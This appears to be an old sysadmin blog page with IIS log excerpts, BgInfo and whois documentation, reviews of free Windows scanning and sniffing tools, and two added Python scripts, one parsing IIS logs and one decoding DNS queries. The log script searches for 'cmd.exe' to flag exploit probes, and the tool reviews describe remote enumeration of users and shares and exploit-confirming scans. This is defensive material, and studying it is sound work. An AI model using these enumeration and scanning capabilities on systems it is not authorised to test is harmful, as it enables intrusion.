2009-11-19 19:42:21 W3SVC874815883 IP-0AF98AC2 10.249.138.194 GET /index.html - 80 - 67.212.138.161 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.2;+en-US;+rv:1.9.1.5)+Gecko/20091102+Firefox/3.5.5+GTB5+(.NET+CLR+3.5.30729) - - powercram.com 200 0 0 366 399 265
2009-11-19 19:42:21 W3SVC874815883 IP-0AF98AC2 10.249.138.194 GET /favicon.ico - 80 - 67.212.138.161 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.2;+en-US;+rv:1.9.1.5)+Gecko/20091102+Firefox/3.5.5+GTB5+(.NET+CLR+3.5.30729) - - powercram.com 404 0 2 1836 380 0
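Because the column layout is declared by the #Fields directive rather than fixed, any tool that reads these logs has to take its column names from that directive instead of hard-coding positions. The Python script below is an added example (not from the original post) that does exactly that for the excerpt above, then runs two simple defender-side checks over the parsed entries: a count of responses per client and status code (a burst of 404s from one c-ip is a classic scan signature), and a search of the requested path and query for a needle such as cmd.exe, the same thing the BareTail note further down this page suggests highlighting. SAMPLE_LOG is the post's own excerpt; the probe line used in the usage note is constructed.

```python
#!/usr/bin/env python3
"""Parse IIS W3C Extended log entries using their #Fields directive.

Added example, not from the original post. SAMPLE_LOG is the excerpt shown in the
post; the 'cmd.exe' needle mirrors the BareTail highlighting example on this page.
"""
from collections import Counter
from typing import Dict, Iterable, List, Sequence, Tuple

Entry = Dict[str, str]

SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2009-11-19 19:42:21
#Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs-version cs(User-Agent) cs(Cookie) cs(Referer) cs-host sc-status sc-substatus sc-win32-status sc-bytes cs-bytes time-taken
2009-11-19 19:42:21 W3SVC874815883 IP-0AF98AC2 10.249.138.194 GET /index.html - 80 - 67.212.138.161 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.2;+en-US;+rv:1.9.1.5)+Gecko/20091102+Firefox/3.5.5+GTB5+(.NET+CLR+3.5.30729) - - powercram.com 200 0 0 366 399 265
2009-11-19 19:42:21 W3SVC874815883 IP-0AF98AC2 10.249.138.194 GET /favicon.ico - 80 - 67.212.138.161 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.2;+en-US;+rv:1.9.1.5)+Gecko/20091102+Firefox/3.5.5+GTB5+(.NET+CLR+3.5.30729) - - powercram.com 404 0 2 1836 380 0
"""


def parse_w3c(text: str) -> Tuple[Dict[str, str], List[Entry]]:
    """Return (directives, entries) for one W3C extended log.

    Entries are split on whitespace, which is safe because IIS replaces spaces
    inside a value with '+' (see the User-Agent above). Column names come from
    the most recent #Fields directive, so a log whose field list changes mid-file
    still parses correctly.
    """
    directives: Dict[str, str] = {}
    fields: List[str] = []
    entries: List[Entry] = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#"):
            name, _, value = line[1:].partition(":")
            value = value.strip()
            directives[name] = value
            if name == "Fields":
                fields = value.split()
            continue
        if not fields:
            raise ValueError(f"line {lineno}: entry before any #Fields directive")
        values = line.split()
        if len(values) != len(fields):
            raise ValueError(f"line {lineno}: expected {len(fields)} fields, got {len(values)}")
        entries.append(dict(zip(fields, values)))
    return directives, entries


def status_by_client(entries: Iterable[Entry]) -> Dict[Tuple[str, str], int]:
    """Count responses per (client IP, HTTP status)."""
    return dict(Counter((e["c-ip"], e["sc-status"]) for e in entries))


def suspicious_requests(entries: Iterable[Entry], needles: Sequence[str] = ("cmd.exe",)) -> List[Entry]:
    """Return entries whose path or query contains one of the needles (case-insensitive)."""
    hits = []
    for e in entries:
        target = (e.get("cs-uri-stem", "") + "?" + e.get("cs-uri-query", "")).lower()
        if any(n.lower() in target for n in needles):
            hits.append(e)
    return hits


if __name__ == "__main__":
    directives, entries = parse_w3c(SAMPLE_LOG)
    print(directives["Software"], "with", len(directives["Fields"].split()), "fields per entry")
    for e in entries:
        print(e["c-ip"], e["cs-method"], e["cs-uri-stem"], e["sc-status"], e["sc-win32-status"])
    print(status_by_client(entries))
    print("suspicious:", suspicious_requests(entries))
```

Note that sc-win32-status is 2 on the favicon request, the Win32 code for "file not found", which is why the HTTP status is 404; keeping both columns is what lets you tell a missing file from a permissions or handler problem that also surfaces as an error page.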

BgInfo - create a Windows desktop wallpaper full of useful information


Download BgInfo (387 KB)

Introduction

How many times have you walked up to a system in your office and needed to click through several diagnostic windows to remind yourself of important aspects of its configuration, such as its name, IP address, or operating system version? If you manage multiple computers you probably need BGInfo. It automatically displays relevant information about a Windows computer on the desktop's background, such as the computer name, IP address, service pack version, and more. You can edit any field as well as the font and background colors, and can place it in your startup folder so that it runs every boot, or even configure it to display as the background for the logon screen.

Because BGInfo simply writes a new desktop bitmap and exits you don't have to worry about it consuming system resources or interfering with other applications.

Sysinternals BgInfo

Installation and Use

See this Windows IT Pro Magazine Power Tools article for a primer on using BgInfo. If you have questions or problems, please visit the Sysinternals BgInfo Forum.

By placing BGInfo in your Startup folder, you can ensure that the system information being displayed is up to date each time you boot. Once you've settled on the information to be displayed, use the command-line option /timer:0 to update the display without showing the dialog box.
You can also use the Windows Scheduler to run BGInfo on a regular basis to ensure long-running systems are kept up to date.

If you create a BGInfo configuration file (using the File|Save Settings menu item) you can automatically import and use those settings on other systems by adding the /I or /iq command line option.

Using BgInfo

When you run BGInfo it shows you the appearance and content of its default desktop background. If left untouched it will automatically apply these settings and exit after its 10 second count-down timer expires.
Selecting any button or menu item will disable the timer, allowing you to customize the layout and content of the background information.

If you want BGInfo to edit or use a configuration stored in a file (instead of the default configuration which is stored in the registry) specify the name of the file on the command line:

BGInfo MyConfig.bgi

Appearance Buttons

Fields: Selects what information appears on the desktop, and the order in which it is displayed. For networking fields (NIC, IP, MAC, etc.) a separate entry is created for each network card on the system. Use the Custom button to add special information you define yourself.
Background: Selects the color and/or wallpaper to use for the background. If you select the Copy existing settings option then BGInfo will use whatever information is currently selected by the logged on user. This option allows end users to personalize their desktop while still displaying the BGInfo information.
Position: Selects the location on the screen at which to place the text. If some items are very long (for example some network card names) you can use the Limit Lines to item to wrap them. The Compensate for Taskbar position checkbox adjusts the position of the text to ensure that it is not covered by the Taskbar. The Multiple Monitor Configuration button allows you to specify how multiple monitors attached to a single console should be handled.
Desktops: Selects which desktops are updated when the configuration is applied. By default only the User Desktop wallpaper is changed. Enabling the Logon Desktop for Console users option specifies that the wallpaper should be displayed on the logon desktop that is presented before anyone has logged onto the system. On Windows 95/98/ME systems the same desktop is used for users and the login screen, so this option has no effect. Enabling the Logon Desktop for Terminal Services users option specifies that the wallpaper should be displayed on the Terminal Services login screen. This option is useful only on servers running Terminal Services.
Preview: Displays the background as it will appear when applied to your system.

Configuration Menu Items

These are options that control how the bitmap is produced, where it is located and how to import/export settings.
File | Open: Opens a BGInfo configuration file.
File | Save As: Saves a copy of the current BGInfo configuration to a new file. Once created, you can have BGInfo use the file later by simply specifying it on the command line, or by using File|Open menu option.
File|Reset Default Settings: Removes all configuration information and resets BGInfo to its default (install-time) state. Use this if you can't determine how to undo a change, or if BGInfo becomes confused about the current state of the bitmap.
File|Database: Specifies a .XLS, .MDB or .TXT file or a connection string to an SQL database that BGInfo should use to store the information it generates. Use this to collect a history of one or more systems on your network. You must ensure that all systems that access the file have the same version of MDAC and JET database support installed. It is recommended you use at least MDAC 2.5 and JET 4.0. If specifying an XLS file the file must already exist.
If you prefer to have BGInfo update the database without modifying the user's wallpaper you can unselect all desktops in the Desktops dialog; BGInfo will still update the database.
Bitmap|256 Colors: Limits the bitmap to 256 colors. This option produces a smaller bitmap.
Bitmap|High Color/True Color: Creates a 16-bit or 24-bit color bitmap.
Bitmap|Match Display: Creates a bitmap with color depth matching that of the display. Because the bitmap generated by BGInfo is not updated when a user changes the display's color depth you may see unexpected results (especially dithering of the text and background) with some combinations of bitmap and display depth.
Bitmap|Location: Specifies the location to place the output bitmap file. On Terminal Services servers the bitmap should be placed in a location that is unique to each user.
Edit|Insert Image: Allows you to insert a bitmap image into the output. Because BGInfo's configuration information is stored in the registry and Windows limits the size of registry values you may encounter errors when inserting larger images. On Windows 9x/Me systems the limit is 16K, while on NT/2000/XP systems the limit is 64K.

Command Line Options

<path> Specifies the name of a configuration file to use for the current session. Changes to the configuration are automatically saved back to the file when OK or Apply is pressed. If this parameter is not present BGInfo uses the default configuration information which is stored in the registry under the current user ("HKEY_CURRENT_USER\Software\Winternals\BGInfo").
/timer Specifies the timeout value for the countdown timer, in seconds. Specifying zero will update the display without displaying the configuration dialog. Specifying 300 seconds or longer disables the timer altogether.
/popup Causes BGInfo to create a popup window containing the configured information without updating the desktop. The information is formatted exactly as it would if displayed on the desktop, but resides in a fitted window instead. When using this option the history database is not updated.
/silent Suppresses error messages.
/taskbar Causes BGInfo to place an icon in the taskbar's status area without updating the desktop. Clicking the icon causes the configured information to appear in a popup window. When using this option the history database is not updated.
/all Specifies that BGInfo should change the wallpaper for any and all users currently logged in to the system. This option is useful within a Terminal Services environment, or when BGInfo is scheduled to run periodically on a system used by more than one person (see Using a Schedule below).
/log Causes BGInfo to write errors to the specified log file instead of generating a warning dialog box. This is useful for tracking down errors that occur when BGInfo is run under the scheduler.
/rtf Causes BGInfo to write its output text to an RTF file. All formatting information and colors are included.


Run BgInfo now from Live.Sysinternals.com

Whois Command Line Utility for Windows

This great command line utility for Windows by Mark Russinovich over at SysInternals is the quick and easy way to get whois info for domain names or IP addresses.

Whois retrieves the registration record for the domain name or IP address that you specify.

Usage
whois domainname [whois.server]
whois IP address [whois.server]
Domainname can be either a DNS name (e.g. www.powercram.com) or IP address (e.g. 96.6.154.135).

For ease of use I prefer to save whois.exe to my Windows system directory (usually C:\Windows\System32) which is already in your path so you can invoke whois from any directory in the command prompt.

Download Whois

FREE Windows Utilities for Scanning, Auditing, and Monitoring

BareTail
Many applications keep detailed logging data in straight text files because the Windows event logs aren't appropriate for certain types of data (e.g., IIS log files). In the course of monitoring or troubleshooting these types of applications, it's often helpful to watch these log files in real time. However, because they're text files, that process typically consists of opening the file in Notepad or another text editor, looking at the contents, closing the file, then reopening the file to see what's changed.

In the UNIX world, a utility that serves this purpose has been available for quite some time: It's called tail. Fortunately, the good folks at Bare Metal Software have developed a free version of the tool called BareTail.

BareTail is a great utility for watching log files, such as IIS logs, cluster logs, and any other type of logs that can generate a lot of data quickly. BareTail can keep up with large log files (e.g., greater than 2GB) just as quickly as with smaller files, and—for easier visual recognition—it can selectively highlight specific entries that appear in a file based on matching text strings. For example, suppose you want to highlight references to cmd.exe in an IIS log file to easily spot which incoming connections are attempting to exploit known vulnerabilities.

One of BareTail's most compelling qualities is that it's a completely standalone executable. There's no installer package to work with, so you can use the utility on a client's system and feel safe that you've had little or no impact on the system after you complete your work.

NeWT
When I have security on the brain, I generally look to the open-source community for answers, rather than to specific vendors. After all, the open-source community can be voracious in its efforts to find and understand every aspect of a vulnerability or flaw. A shining example of this security consciousness is the open-source vulnerability scanner called Nessus.

Nessus is the world's most popular open-source vulnerability scanner. An estimated 75,000 organizations worldwide rely on Nessus to assess their networks and check for vulnerabilities. Originally launched in 1998 for UNIX, Nessus has been ported over to Windows by Tenable Network Security in a version called NeWT.

Tenable Network Security provides the standard version of NeWT free for anyone to use for any reason. The only limitation is that the host that NeWT runs on can scan only its local subnet. With more than 6000 known vulnerabilities that it can test for, NeWT is now the best vulnerability scanner available for the Windows platform.

When you unleash NeWT on your local subnet, it starts its process of testing each host it finds for vulnerabilities in its database. You can configure NeWT to test only for certain vulnerabilities—for example, if you're a 100 percent Microsoft shop, you don't need to test for UNIX vulnerabilities—and whether to attempt to fully exploit any vulnerabilities found to confirm its tests. NeWT can check for buffer-overflow vulnerabilities, watch for misconfigured application services (e.g., mail, Web), find all the listening ports on a server and determine the OS type, look for backdoors installed on an infected host, and more.

If you provide NeWT with appropriate administrative credentials, it will dive even deeper into your systems and check for local patching or the existence of malicious software. For example, on a test "victim" system in my lab, NeWT detected several spyware and adware packages that I intentionally installed on that host for some tests. NeWT recommended that I remove those applications. NeWT is the first tool I grab when I start a security assessment for a client, and it should be in every administrator's toolbox.

Winfingerprint
If you're looking for a quick and simple way to obtain information about a remote system, Winfingerprint is the tool of choice. Winfingerprint is a network scanner that runs on Windows. Unlike most network scanners, Winfingerprint is specifically designed to obtain information about Microsoft hosts and applications. Winfingerprint can use ICMP, RPC, SMB, SNMP, TCP, and UDP to obtain information (e.g., OS version, users, groups, SIDs, password policies, services, service packs and hotfixes, NetBIOS shares, transports, sessions, disks) about target systems. Winfingerprint comes in both a GUI version and a command-line version, so however you prefer to work, there's a version of Winfingerprint for you.

Winfingerprint determined the number of drives I had installed on my target system, as well as the MAC addresses of the interfaces and the OS and patch level. What you can't see in the figure, however, is that Winfingerprint went on to enumerate all the share names on that system, as well as the services that were installed and the names of the users. The tool obtained all that data in about 20 seconds, making Winfingerprint a terrific tool for quickly collecting inventory data about networked systems.

Wednesday, November 18, 2009

FREE Windows Utilities for Sniffing

WinDump
WinDump is an exceptionally powerful command-line packet sniffer. Ported over from the source of the Tcpdump utility available for UNIX, WinDump carries over the same power and flexibility to the Windows world, all in a lightweight executable.

WinDump is a helpful utility when you need to do some quick and easy packet capturing to diagnose a network problem. It's flexible, and it can capture and display details about every packet going across the network interface. It can filter the output results based on protocol (e.g., Address Resolution Protocol—ARP, IP, TCP, UDP), source network or host, destination network or host, source port, destination port, and many other criteria.

To use WinDump, you'll first need to download and install the Windows Packet Capture Library (WinPcap), the Windows port of the open-source packet-capture and network-analysis library libpcap for UNIX. WinPcap runs on all versions of Windows.

After you install WinPcap, you can download the standalone WinDump executable. To launch WinDump, simply run it from the command line with the appropriate options for what you'd like to capture or read. You'll find the online manual for WinDump here.

The first command you might want to execute is WinDump -D, which will display a list of interfaces available on your computer, as well as a corresponding number for each interface, so that you can determine which interface to use for your sniffing activities. After you know which interface to run, you can simply use that number with the -i option (i.e., WinDump -i 3, if number 3 is the interface you'd like to use) to start viewing packet data in real time. (Because these are ports of UNIX utilities, the command-line switches are case-sensitive.)

Ngrep
Although WinDump is a tremendous utility, sometimes it requires a considerable amount of overhead or knowledge to determine what you're looking for. For example, suppose you're trying to look up whether a DNS query is making it across your network, but you aren't familiar with the protocols and ports that DNS uses by default. Or, suppose a lot of traffic is coming across a network connection, and you're finding it too cumbersome to work through all the packets just to find the one particular packet you're looking for. For such situations enter ngrep, the network-aware grep utility.

If you aren't familiar with grep, it's probably one of the most widely known and oft-utilized UNIX utilities. Grep finds matching text strings (through a mechanism known as regular expressions) in files on a file system, then outputs the lines to the display. You might compare grep with the Windows command-line Find utility, but grep differs by providing an exceptional amount of power in its search for text strings.

By applying these capabilities to the network layer, ngrep provides the same level of functionality for packet sniffing. As a result, you don't need to know what protocols, ports, network, or IP addresses that two devices are using to transfer data. You just need to know something about the packet's payload, and ngrep will find it for you—regardless of how it's transmitted.

Ngrep is great for troubleshooting DNS query problems. In a large Active Directory (AD) environment, dozens of DNS queries are typically occurring across the network per second. If I'm trying to troubleshoot a specific set of problems, searching each packet to find the one I'm looking for is cumbersome at best. Instead of relying on a straight packet capture of all DNS traffic, I can simply use ngrep to find the text string I'm looking for because DNS queries and responses are performed in plain text.

Ngrep currently recognizes ICMP, IGMP, Raw, TCP, and UDP protocols across 802.11, Ethernet, FDDI, PPP, SLIP, Token Ring, and null interfaces. Like WinDump it requires the WinPcap library to operate properly.
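DNS queries are readable on the wire, but not quite as you type them: each label of the name is prefixed by its length byte and there are no dots in the packet, so a literal search for "www.example.com" finds nothing while a search for "example" succeeds, and a regular expression matches only because its "." wildcard happens to swallow the length bytes. The Python script below is an added example (not from the original article) that builds a minimal query with the standard-library struct module, decodes the question name back out, and shows the three kinds of match side by side. The name www.example.com and the transaction ID are sample values.

```python
#!/usr/bin/env python3
"""Show what a DNS query looks like on the wire and what a payload grep can match.

Added example (not from the original article). The query is constructed locally
with struct; 'www.example.com' and the transaction ID 0x1234 are sample values.
"""
import re
import struct
from typing import Tuple

HEADER_LEN = 12  # DNS header: ID, flags, QDCOUNT, ANCOUNT, NSCOUNT, ARCOUNT


def build_query(name: str, txid: int = 0x1234, qtype: int = 1) -> bytes:
    """Build a minimal DNS query (RFC 1035): header, then QNAME/QTYPE/QCLASS.

    Each label is written as a length byte followed by the label's bytes and the
    sequence ends with a zero byte; dots never appear in the packet.
    """
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # RD set, one question
    qname = b""
    for label in name.strip(".").split("."):
        if not 1 <= len(label) <= 63:
            raise ValueError(f"bad label {label!r}")
        qname += bytes([len(label)]) + label.encode("ascii")
    qname += b"\x00"
    return header + qname + struct.pack("!HH", qtype, 1)  # QTYPE A, QCLASS IN


def decode_qname(payload: bytes, offset: int = HEADER_LEN) -> Tuple[str, int]:
    """Decode the label sequence at offset; return (dotted name, offset after it).

    Only uncompressed names are handled, which is all a query's question uses.
    """
    labels = []
    while True:
        length = payload[offset]
        offset += 1
        if length == 0:
            break
        if length & 0xC0:
            raise ValueError("compression pointer in question name")
        labels.append(payload[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), offset


def raw_grep(payload: bytes, text: str) -> bool:
    """Literal substring match on the raw payload bytes (grep -F style)."""
    return text.encode("ascii") in payload


def regex_grep(payload: bytes, pattern: str) -> bool:
    """Regular-expression match on the raw bytes, as ngrep does by default."""
    return re.search(pattern.encode("ascii"), payload) is not None


def name_grep(payload: bytes, text: str) -> bool:
    """Match against the decoded name, so dotted patterns work as typed."""
    name, _ = decode_qname(payload)
    return text in name


if __name__ == "__main__":
    q = build_query("www.example.com")
    print("wire bytes:", q.hex())
    print("decoded name:", decode_qname(q)[0])
    print("literal 'example':", raw_grep(q, "example"))
    print("literal 'www.example.com':", raw_grep(q, "www.example.com"))
    print("regex 'www.example.com':", regex_grep(q, "www.example.com"))
    print("decoded 'www.example.com':", name_grep(q, "www.example.com"))
```

The practical consequence when hunting for a name in DNS traffic: search for a single label, or escape the dots in a pattern and accept that each one must match exactly one length byte; a decoded match is the only one that means what it says.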

WireShark (formerly Ethereal)
When you face a situation in which you need to roll up your sleeves and dive as deeply as possible into network capture and analysis, one utility needs to come to mind: the world's most popular network analyzer, WireShark. Network experts around the world use WireShark because it has all the standard features you'll find in most protocol analyzers, in addition to some you won't find in any other product. More than 400 developers around the world have made contributions to this open-source application. A decade ago, you would have to pay thousands of dollars for software that had the same capabilities, but WireShark offers it all free.

WireShark can capture data off your network connection, filter the data, dive into the details of each packet, save the packet capture for detailed analysis, send packet captures to other network engineers (or vendors) to help with debugging, and open packet captures from many other leading packet-capture utilities. WireShark can capture data off of various network transports, such as Classical IP over ATM (CIP), Ethernet, Fiber Distributed Data Interface (FDDI), Point-to-Point Protocol (PPP), Token Ring, 802.11, and loopback interfaces (although it doesn't support all types on every platform). Across all those network transports, WireShark can "dissect" more than 750 protocol types, including FTP, HTTP, NetBIOS, POP3, remote procedure call (RPC), SNMP, SSH, SMTP, and Telnet, just to name a few.

Like the other sniffing utilities I've mentioned, WireShark depends on an installation of WinPcap to function properly, so you'll need to install that first. Then, after you install the latest Ethereal distribution for Windows, simply access the Capture, Interfaces menu and select the interface you want to start using for capture. Then, you're ready to start analyzing your traffic.